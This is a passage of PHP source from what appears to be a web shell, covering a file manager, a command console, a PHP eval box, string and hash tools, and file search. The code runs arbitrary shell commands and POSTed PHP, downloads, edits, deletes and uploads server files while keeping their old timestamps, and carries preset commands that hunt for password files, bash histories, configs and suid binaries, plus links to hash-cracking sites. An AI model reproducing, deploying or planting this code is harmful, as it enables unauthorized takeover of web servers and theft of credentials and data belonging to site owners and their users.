                        $temp[] = $â;
                showSecParam('Userful', implode(', ',$temp));
                $temp=array();
                foreach ($danger as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Danger', implode(', ',$temp));
                $temp=array();
                foreach ($downloaders as $â)
                    if(which($â))
                        $temp[] = $â;
                showSecParam('Downloaders', implode(', ',$temp));
                echo '<br/>';
                showSecParam('HDD space', ex('df -h'));
                showSecParam('Hosts', @file_get_contents('/etc/hosts'));
                                showSecParam('Mount options', @file_get_contents('/etc/fstab'));
            }
        } else {
                showSecParam('OS Version',ex('ver'));
                showSecParam('Account Settings', iconv('CP866', 'UTF-8',ex('net accounts')));
                showSecParam('User Accounts', iconv('CP866', 'UTF-8',ex('net user')));
        }
        echo '</div>';
        hardFooter();
}
function actionFilesTools() {
        if( isset($_POST['p1']) )
                $_POST['p1'] = urldecode($_POST['p1']);
        if(@$_POST['p2']=='download') {
                if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) {
                        ob_start("ob_gzhandler", 4096);
                        header("Content-Disposition: attachment; filename=".basename($_POST['p1']));
                        if (function_exists("mime_content_type")) {
                                $type = @mime_content_type($_POST['p1']);
                                header("Content-Type: " . $type);
                        } else
                header("Content-Type: application/octet-stream");
                        $fp = @fopen($_POST['p1'], "r");
                        if($fp) {
                                while(!@feof($fp))
                                        echo @fread($fp, 1024);
                                fclose($fp);
                        }
                }exit;
        }
        if( @$_POST['p2'] == 'mkfile' ) {
                if(!file_exists($_POST['p1'])) {
                        $fp = @fopen($_POST['p1'], 'w');
                        if($fp) {
                                $_POST['p2'] = "edit";
                                fclose($fp);
                        }
                }
        }
        hardHeader();
        echo '<h1>File tools</h1><div class=content>';
        if( !file_exists(@$_POST['p1']) ) {
                echo 'File not exists';
                hardFooter();
                return;
        }
        $uid = @posix_getpwuid(@fileowner($_POST['p1']));
        if(!$uid) {
                $uid['name'] = @fileowner($_POST['p1']);
                $gid['name'] = @filegroup($_POST['p1']);
        } else $gid = @posix_getgrgid(@filegroup($_POST['p1']));
        echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?viewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.viewPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>';
        echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>';
        if( empty($_POST['p2']) )
                $_POST['p2'] = 'view';
        if( is_file($_POST['p1']) )
                $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch');
        else
                $m = array('Chmod', 'Rename', 'Touch');
        foreach($m as $v)
                echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> ';
        echo '<br><br>';
        switch($_POST['p2']) {
                case 'view':
                        echo '<pre class=ml1>';
                        $fp = @fopen($_POST['p1'], 'r');
                        if($fp) {
                                while( !@feof($fp) )
                                        echo htmlspecialchars(@fread($fp, 1024));
                                @fclose($fp);
                        }
                        echo '</pre>';
                        break;
                case 'highlight':
                        if( @is_readable($_POST['p1']) ) {
                                echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">';
                                $code = @highlight_file($_POST['p1'],true);
                                echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>';
                        }
                        break;
                case 'chmod':
                        if( !empty($_POST['p3']) ) {
                                $perms = 0;
                                for($i=strlen($_POST['p3'])-1;$i>=0;--$i)
                                        $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1));
                                if(!@chmod($_POST['p1'], $perms))
                                        echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>';
                        }
                        clearstatcache();
                        echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>';
                        break;
                case 'edit':
                        if( !is_writable($_POST['p1'])) {
                                echo 'File isn\'t writeable';
                                break;
                        }
                        if( !empty($_POST['p3']) ) {
                                $time = @filemtime($_POST['p1']);
                                $_POST['p3'] = substr($_POST['p3'],1);
                                $fp = @fopen($_POST['p1'],"w");
                                if($fp) {
                                        @fwrite($fp,$_POST['p3']);
                                        @fclose($fp);
                                        echo 'Saved!<br><script>p3_="";</script>';
                                        @touch($_POST['p1'],$time,$time);
                                }
                        }
                        echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>';
                        $fp = @fopen($_POST['p1'], 'r');
                        if($fp) {
                                while( !@feof($fp) )
                                        echo htmlspecialchars(@fread($fp, 1024));
                                @fclose($fp);
                        }
                        echo '</textarea><input type=submit value=">>"></form>';
                        break;
                case 'hexdump':
                        $c = @file_get_contents($_POST['p1']);
                        $n = 0;
                        $h = array('00000000<br>','','');
                        $len = strlen($c);
                        for ($i=0; $i<$len; ++$i) {
                                $h[1] .= sprintf('%02X',ord($c[$i])).' ';
                                switch ( ord($c[$i]) ) {
                                        case 0:  $h[2] .= ' '; break;
                                        case 9:  $h[2] .= ' '; break;
                                        case 10: $h[2] .= ' '; break;
                                        case 13: $h[2] .= ' '; break;
                                        default: $h[2] .= $c[$i]; break;
                                }
                                $n++;
                                if ($n == 32) {
                                        $n = 0;
                                        if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';}
                                        $h[1] .= '<br>';
                                        $h[2] .= "\n";
                                }
                        }
                        echo '<table cellspacing=1 cellpadding=5 bgcolor=#222><tr><td bgcolor=#1e252e><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#060a10><pre>'.$h[1].'</pre></td><td bgcolor=#1e252e><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>';
                        break;
                case 'rename':
                        if( !empty($_POST['p3']) ) {
                                if(!@rename($_POST['p1'], $_POST['p3']))
                                        echo 'Can\'t rename!<br>';
                                else
                                        die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>');
                        }
                        echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>';
                        break;
                case 'touch':
                        if( !empty($_POST['p3']) ) {
                                $time = strtotime($_POST['p3']);
                                if($time) {
                                        if(!touch($_POST['p1'],$time,$time))
                                                echo 'Fail!';
                                        else
                                                echo 'Touched!';
                                } else echo 'Bad time format!';
                        }
                        clearstatcache();
                        echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>';
                        break;
        }
        echo '</div>';
        hardFooter();
}
if($os == 'win')
        $aliases = array(
                "List Directory" => "dir",
        "Find index.php in current dir" => "dir /s /w /b index.php",
        "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        "Show active connections" => "netstat -an",
        "Show running services" => "net start",
        "User accounts" => "net user",
        "Show computers" => "net view",
                "ARP Table" => "arp -a",
                "IP Configuration" => "ipconfig /all"
        );
else
        $aliases = array(
                "List dir" => "ls -lha",
                "list file attributes on a Linux second extended file system" => "lsattr -va",
                "show opened ports" => "netstat -an | grep -i listen",
        "process status" => "ps aux",
                "Find" => "",
                "find all suid files" => "find / -type f -perm -04000 -ls",
                "find suid files in current dir" => "find . -type f -perm -04000 -ls",
                "find all sgid files" => "find / -type f -perm -02000 -ls",
                "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
                "find config.inc.php files" => "find / -type f -name config.inc.php",
                "find config* files" => "find / -type f -name \"config*\"",
                "find config* files in current dir" => "find . -type f -name \"config*\"",
                "find all writable folders and files" => "find / -perm -2 -ls",
                "find all writable folders and files in current dir" => "find . -perm -2 -ls",
                "find all service.pwd files" => "find / -type f -name service.pwd",
                "find service.pwd files in current dir" => "find . -type f -name service.pwd",
                "find all .htpasswd files" => "find / -type f -name .htpasswd",
                "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
                "find all .bash_history files" => "find / -type f -name .bash_history",
                "find .bash_history files in current dir" => "find . -type f -name .bash_history",
                "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
                "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
                "Locate" => "",
                "locate httpd.conf files" => "locate httpd.conf",
                "locate vhosts.conf files" => "locate vhosts.conf",
                "locate proftpd.conf files" => "locate proftpd.conf",
                "locate psybnc.conf files" => "locate psybnc.conf",
                "locate my.conf files" => "locate my.conf",
                "locate admin.php files" =>"locate admin.php",
                "locate cfg.php files" => "locate cfg.php",
                "locate conf.php files" => "locate conf.php",
                "locate config.dat files" => "locate config.dat",
                "locate config.php files" => "locate config.php",
                "locate config.inc files" => "locate config.inc",
                "locate config.inc.php" => "locate config.inc.php",
                "locate config.default.php files" => "locate config.default.php",
                "locate config* files " => "locate config",
                "locate .conf files"=>"locate '.conf'",
                "locate .pwd files" => "locate '.pwd'",
                "locate .sql files" => "locate '.sql'",
                "locate .htpasswd files" => "locate '.htpasswd'",
                "locate .bash_history files" => "locate '.bash_history'",
                "locate .mysql_history files" => "locate '.mysql_history'",
                "locate .fetchmailrc files" => "locate '.fetchmailrc'",
                "locate backup files" => "locate backup",
                "locate dump files" => "locate dump",
                "locate priv files" => "locate priv"
        );
function actionConsole() {
    if(!empty($_POST['p1']) && !empty($_POST['p2'])) {
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true);
        $_POST['p1'] .= ' 2>&1';
    } elseif(!empty($_POST['p1']))
        prototype(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0);
        if(isset($_POST['ajax'])) {
                prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
                ob_start();
                echo "d.cf.cmd.value='';\n";
                $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".ex($_POST['p1']),"\n\r\t\'\0"));
                if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) {
                        if(@chdir($match[1])) {
                                $GLOBALS['cwd'] = @getcwd();
                                echo "c_='".$GLOBALS['cwd']."';";
                        }
                }
                echo "d.cf.output.value+='".$temp."';";
                echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;";
                $temp = ob_get_clean();
                echo strlen($temp), "\n", $temp;
                exit;
        }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
                prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
        hardHeader();
    echo "<script>
if(window.Event) window.captureEvents(Event.KEYDOWN);
var cmds = new Array('');
var cur = 0;
function kp(e) {
        var n = (window.Event) ? e.which : e.keyCode;
        if(n == 38) {
                cur--;
                if(cur>=0)
                        document.cf.cmd.value = cmds[cur];
                else
                        cur++;
        } else if(n == 40) {
                cur++;
                if(cur < cmds.length)
                        document.cf.cmd.value = cmds[cur];
                else
                        cur--;
        }
}
function add(cmd) {
        cmds.pop();
        cmds.push(cmd);
        cmds.push('');
        cur = cmds.length-1;
}
</script>";
        echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>';
        foreach($GLOBALS['aliases'] as $n => $v) {
                if($v == '') {
                        echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>';
                        continue;
                }
                echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>';
        }
 
        echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>';
        if(!empty($_POST['p1'])) {
                echo htmlspecialchars("$ ".$_POST['p1']."\n".ex($_POST['p1']));
        }
        echo '</textarea><table style="border:1px solid #060a10;background-color:#060a10;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td style="padding-left:4px; width:13px;">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>';
        echo '</form></div><script>d.cf.cmd.focus();</script>';
        hardFooter();
}
function actionPhp() {
        if( isset($_POST['ajax']) ) {
                $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = true;
                ob_start();
                eval($_POST['p1']);
                $temp = "document.getElementById('PhpOutput').style.display='';document.getElementById('PhpOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
                echo strlen($temp), "\n", $temp;
                exit;
        }
        hardHeader();
        if( isset($_POST['p2']) && ($_POST['p2'] == 'info') ) {
                echo '<h1>PHP info</h1><div class=content>';
                ob_start();
                phpinfo();
                $tmp = ob_get_clean();
                $tmp = preg_replace('!body {.*}!msiU','',$tmp);
                $tmp = preg_replace('!a:\w+ {.*}!msiU','',$tmp);
                $tmp = preg_replace('!h1!msiU','h2',$tmp);
                $tmp = preg_replace('!td, th {(.*)}!msiU','.e, .v, .h, .h th {$1}',$tmp);
                $tmp = preg_replace('!body, td, th, h2, h2 {.*}!msiU','',$tmp);
                echo $tmp;
                echo '</div><br>';
        }
        if(empty($_POST['ajax'])&&!empty($_POST['p1']))
                $_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax'] = false;
                echo '<h1>Execution PHP-code</h1><div class=content><form name=pf method=post onsubmit="if(this.ajax.checked){a(null,null,this.code.value);}else{g(null,null,this.code.value,\'\');}return false;"><textarea name=code class=bigarea id=PhpCode>'.(!empty($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'</textarea><input type=submit value=Eval style="margin-top:5px">';
        echo ' <input type=checkbox name=ajax value=1 '.($_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX</form><pre id=PhpOutput style="'.(empty($_POST['p1'])?'display:none;':'').'margin-top:5px;" class=ml1>';
        if(!empty($_POST['p1'])) {
                ob_start();
                eval($_POST['p1']);
                echo htmlspecialchars(ob_get_clean());
        }
        echo '</pre></div>';
        hardFooter();
}
function actionFilesMan() {
    if (!empty ($_COOKIE['f']))
        $_COOKIE['f'] = @unserialize($_COOKIE['f']);
 
        if(!empty($_POST['p1'])) {
                switch($_POST['p1']) {
                        case 'uploadFile':
                                if ( is_array($_FILES['f']['tmp_name']) ) {
                                        foreach ( $_FILES['f']['tmp_name'] as $i => $tmpName ) {
                        if(!@move_uploaded_file($tmpName, $_FILES['f']['name'][$i])) {
                                echo "Can't upload file!";
                                                        }
                                                }
                                        }
                                break;
                        case 'mkdir':
                                if(!@mkdir($_POST['p2']))
                                        echo "Can't create new dir";
                                break;
                        case 'delete':
                                function deleteDir($path) {
                                        $path = (substr($path,-1)=='/') ? $path:$path.'/';
                                        $dh  = opendir($path);
                                        while ( ($â = readdir($dh) ) !== false) {
                                                $â = $path.$â;
                                                if ( (basename($â) == "..") || (basename($â) == ".") )
                                                        continue;
                                                $type = filetype($â);
                                                if ($type == "dir")
                                                        deleteDir($â);
                                                else
                                                        @unlink($â);
                                        }
                                        closedir($dh);
                                        @rmdir($path);
                                }
                                if(is_array(@$_POST['f']))
                                        foreach($_POST['f'] as $f) {
                        if($f == '..')
                            continue;
                                                $f = urldecode($f);
                                                if(is_dir($f))
                                                        deleteDir($f);
                                                else
                                                        @unlink($f);
                                        }
                                break;
                        case 'paste':
                                if($_COOKIE['act'] == 'copy') {
                                        function copy_paste($c,$s,$d){
                                                if(is_dir($c.$s)){
                                                        mkdir($d.$s);
                                                        $h = @opendir($c.$s);
                                                        while (($f = @readdir($h)) !== false)
                                                                if (($f != ".") and ($f != ".."))
                                                                        copy_paste($c.$s.'/',$f, $d.$s.'/');
                                                } elseif(is_file($c.$s))
                                                        @copy($c.$s, $d.$s);
                                        }
                                        foreach($_COOKIE['f'] as $f)
                                                copy_paste($_COOKIE['c'],$f, $GLOBALS['cwd']);
                                } elseif($_COOKIE['act'] == 'move') {
                                        function move_paste($c,$s,$d){
                                                if(is_dir($c.$s)){
                                                        mkdir($d.$s);
                                                        $h = @opendir($c.$s);
                                                        while (($f = @readdir($h)) !== false)
                                                                if (($f != ".") and ($f != ".."))
                                                                        copy_paste($c.$s.'/',$f, $d.$s.'/');
                                                } elseif(@is_file($c.$s))
                                                        @copy($c.$s, $d.$s);
                                        }
                                        foreach($_COOKIE['f'] as $f)
                                                @rename($_COOKIE['c'].$f, $GLOBALS['cwd'].$f);
                                } elseif($_COOKIE['act'] == 'zip') {
                                        if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        if ($zip->open($_POST['p2'], 1)) {
                            chdir($_COOKIE['c']);
                            foreach($_COOKIE['f'] as $f) {
                                if($f == '..')
                                    continue;
                                if(@is_file($_COOKIE['c'].$f))
                                    $zip->addFile($_COOKIE['c'].$f, $f);
                                elseif(@is_dir($_COOKIE['c'].$f)) {
                                    $iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($f.'/', FilesystemIterator::SKIP_DOTS));
                                    foreach ($iterator as $key=>$value) {
                                        $zip->addFile(realpath($key), $key);
                                    }
                                }
                            }
                            chdir($GLOBALS['cwd']);
                            $zip->close();
                        }
                    }
                                } elseif($_COOKIE['act'] == 'unzip') {
                                        if(class_exists('ZipArchive')) {
                        $zip = new ZipArchive();
                        foreach($_COOKIE['f'] as $f) {
                            if($zip->open($_COOKIE['c'].$f)) {
                                $zip->extractTo($GLOBALS['cwd']);
                                $zip->close();
                            }
                        }
                    }
                                } elseif($_COOKIE['act'] == 'tar') {
                    chdir($_COOKIE['c']);
                    $_COOKIE['f'] = array_map('escapeshellarg', $_COOKIE['f']);
                    ex('tar cfzv ' . escapeshellarg($_POST['p2']) . ' ' . implode(' ', $_COOKIE['f']));
                    chdir($GLOBALS['cwd']);
                                }
                                unset($_COOKIE['f']);
                setcookie('f', '', time() - 3600);
                                break;
                        default:
                if(!empty($_POST['p1'])) {
                                        prototype('act', $_POST['p1']);
                                        prototype('f', serialize(@$_POST['f']));
                                        prototype('c', @$_POST['c']);
                                }
                                break;
                }
        }
    hardHeader();
        echo '<h1>File manager</h1><div class=content><script>p1_=p2_=p3_="";</script>';
        $dirContent = hardScandir(isset($_POST['c'])?$_POST['c']:$GLOBALS['cwd']);
        if($dirContent === false) {     echo 'Can\'t open this folder!';hardFooter(); return; }
        global $sort;
        $sort = array('name', 1);
        if(!empty($_POST['p1'])) {
                if(preg_match('!s_([A-z]+)_(\d{1})!', $_POST['p1'], $match))
                        $sort = array($match[1], (int)$match[2]);
        }
echo "<script>
        function sa() {
                for(i=0;i<d.files.elements.length;i++)
                        if(d.files.elements[i].type == 'checkbox')
                                d.files.elements[i].checked = d.files.elements[0].checked;
        }
</script>
<table width='100%' class='main' cellspacing='0' cellpadding='2'>
<form name=files method=post><tr><th width='13px'><input type=checkbox onclick='sa()' class=chkbx></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_name_".($sort[1]?0:1)."\")'>Name</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_size_".($sort[1]?0:1)."\")'>Size</a></th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_modify_".($sort[1]?0:1)."\")'>Modify</a></th><th>Owner/Group</th><th><a href='#' onclick='g(\"FilesMan\",null,\"s_perms_".($sort[1]?0:1)."\")'>Permissions</a></th><th>Actions</th></tr>";
        $dirs = $files = array();
        $n = count($dirContent);
        for($i=0;$i<$n;$i++) {
                $ow = @posix_getpwuid(@fileowner($dirContent[$i]));
                $gr = @posix_getgrgid(@filegroup($dirContent[$i]));
                $tmp = array('name' => $dirContent[$i],
                                         'path' => $GLOBALS['cwd'].$dirContent[$i],
                                         'modify' => date('Y-m-d H:i:s', @filemtime($GLOBALS['cwd'] . $dirContent[$i])),
                                         'perms' => viewPermsColor($GLOBALS['cwd'] . $dirContent[$i]),
                                         'size' => @filesize($GLOBALS['cwd'].$dirContent[$i]),
                                         'owner' => $ow['name']?$ow['name']:@fileowner($dirContent[$i]),
                                         'group' => $gr['name']?$gr['name']:@filegroup($dirContent[$i])
                                        );
                if(@is_file($GLOBALS['cwd'] . $dirContent[$i]))
                        $files[] = array_merge($tmp, array('type' => 'file'));
                elseif(@is_link($GLOBALS['cwd'] . $dirContent[$i]))
                        $dirs[] = array_merge($tmp, array('type' => 'link', 'link' => readlink($tmp['path'])));
                elseif(@is_dir($GLOBALS['cwd'] . $dirContent[$i]))
                        $dirs[] = array_merge($tmp, array('type' => 'dir'));
        }
        $GLOBALS['sort'] = $sort;
        function cmp($a, $b) {
                if($GLOBALS['sort'][0] != 'size')
                        return strcmp(strtolower($a[$GLOBALS['sort'][0]]), strtolower($b[$GLOBALS['sort'][0]]))*($GLOBALS['sort'][1]?1:-1);
                else
                        return (($a['size'] < $b['size']) ? -1 : 1)*($GLOBALS['sort'][1]?1:-1);
        }
        usort($files, "cmp");
        usort($dirs, "cmp");
        $files = array_merge($dirs, $files);
        $l = 0;
        foreach($files as $f) {
                echo '<tr'.($l?' class=l1':'').'><td><input type=checkbox name="f[]" value="'.urlencode($f['name']).'" class=chkbx></td><td><a href=# onclick="'.(($f['type']=='file')?'g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'view\')">'.htmlspecialchars($f['name']):'g(\'FilesMan\',\''.$f['path'].'\');" ' . (empty ($f['link']) ? '' : "title='{$f['link']}'") . '><b>[ ' . htmlspecialchars($f['name']) . ' ]</b>').'</a></td><td>'.(($f['type']=='file')?viewSize($f['size']):$f['type']).'</td><td>'.$f['modify'].'</td><td>'.$f['owner'].'/'.$f['group'].'</td><td><a href=# onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\',\'chmod\')">'.$f['perms']
                        .'</td><td><a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'rename\')">R</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'touch\')">T</a>'.(($f['type']=='file')?' <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'edit\')">E</a> <a href="#" onclick="g(\'FilesTools\',null,\''.urlencode($f['name']).'\', \'download\')">D</a>':'').'</td></tr>';
                $l = $l?0:1;
        }
        echo "<tr><td colspan=7>
        <input type=hidden name=ne value=''>
        <input type=hidden name=a value='FilesMan'>
        <input type=hidden name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'>
        <input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'')."'>
        <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>";
    if(class_exists('ZipArchive'))
        echo "<option value='zip'>+ zip</option><option value='unzip'>- zip</option>";
    echo "<option value='tar'>+ tar.gz</option>";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']))
        echo "<option value='paste'>â³ Paste</option>";
    echo "</select>&nbsp;";
    if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar')))
        echo "file name: <input type=text name=p2 value='hard_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;";
    echo "<input type='submit' value='>>'></td></tr></form></table></div>";
        hardFooter();
}
function actionStringTools() {
        if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}}
    if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}}
        if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}}
        if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}}
        if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}}
        $stringTools = array(
                'Base64 encode' => 'base64_encode',
                'Base64 decode' => 'base64_decode',
                'Url encode' => 'urlencode',
                'Url decode' => 'urldecode',
                'Full urlencode' => 'full_urlencode',
                'md5 hash' => 'md5',
                'sha1 hash' => 'sha1',
                'crypt' => 'crypt',
                'CRC32' => 'crc32',
                'ASCII to HEX' => 'ascii2hex',
                'HEX to ASCII' => 'hex2ascii',
                'HEX to DEC' => 'hexdec',
                'HEX to BIN' => 'hex2bin',
                'DEC to HEX' => 'dechex',
                'DEC to BIN' => 'decbin',
                'BIN to HEX' => 'binhex',
                'BIN to DEC' => 'bindec',
                'String to lower case' => 'strtolower',
                'String to upper case' => 'strtoupper',
                'Htmlspecialchars' => 'htmlspecialchars',
                'String length' => 'strlen',
        );
        if(isset($_POST['ajax'])) {
                prototype(md5($_SERVER['HTTP_HOST']).'ajax', true);
                ob_start();
                if(in_array($_POST['p1'], $stringTools))
                        echo $_POST['p1']($_POST['p2']);
                $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n";
                echo strlen($temp), "\n", $temp;
                exit;
        }
    if(empty($_POST['ajax'])&&!empty($_POST['p1']))
                prototype(md5($_SERVER['HTTP_HOST']).'ajax', 0);
        hardHeader();
        echo '<h1>String conversions</h1><div class=content>';
        echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>";
        foreach($stringTools as $k => $v)
                echo "<option value='".htmlspecialchars($v)."'>".$k."</option>";
                echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>";
        if(!empty($_POST['p1'])) {
                if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2']));
        }
        echo"</pre></div><br><h1>Search files:</h1><div class=content>
                <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
                        <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
                        <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
                        <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
                        <tr><td></td><td><input type='submit' value='>>'></td></tr>
                        </table></form>";
        function hardRecursiveGlob($path) {
                if(substr($path, -1) != '/')
                        $path.='/';
                $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR)));
                if(is_array($paths)&&@count($paths)) {
                        foreach($paths as $â) {
                                if(@is_dir($â)){
                                        if($path!=$â)
                                                hardRecursiveGlob($â);
                                } else {
                                        if(empty($_POST['p2']) || @strpos(file_get_contents($â), $_POST['p2'])!==false)
                                                echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($â)."\", \"view\",\"\")'>".htmlspecialchars($â)."</a><br>";
                                }
                        }
                }
        }
        if(@$_POST['p3'])
                hardRecursiveGlob($_POST['c']);
        echo "</div><br><h1>Search for hash:</h1><div class=content>
                <form method='post' target='_blank' name='hf'>
                        <input type='text' name='hash' style='width:200px;'><br>
            <input type='hidden' name='act' value='find'/>
                        <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
                        <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
            <input type='button' value='fakenamegenerator.com' onclick=\"document.hf.action='http://www.fakenamegenerator.com/';document.hf.submit()\"><br>
                        <input type='button' value='hashcrack.com' onclick=\"document.hf.action='http://www.hashcrack.com/index.php';document.hf.submit()\"><br>
                        <input type='button' value='tools4noobs.com' onclick=\"document.hf.action='http://www.tools4noobs.com/online_php_functions/';document.hf.submit()\"><br>
                        <input type='button' value='md5decrypter.com' onclick=\"document.hf.action='http://www.md5decrypter.com/';document.hf.submit()\"><br>
                        <input type='button' value='artlebedev.ru' onclick=\"document.hf.action='https://www.artlebedev.ru/tools/decoder/';document.hf.submit()\"><br>
                </form></div>";
        hardFooter();
}
function actionSafeMode() {
        $temp='';
        ob_start();
        switch($_POST['p1']) {
                case 1:
                        $temp=@tempnam($test, 'cx');
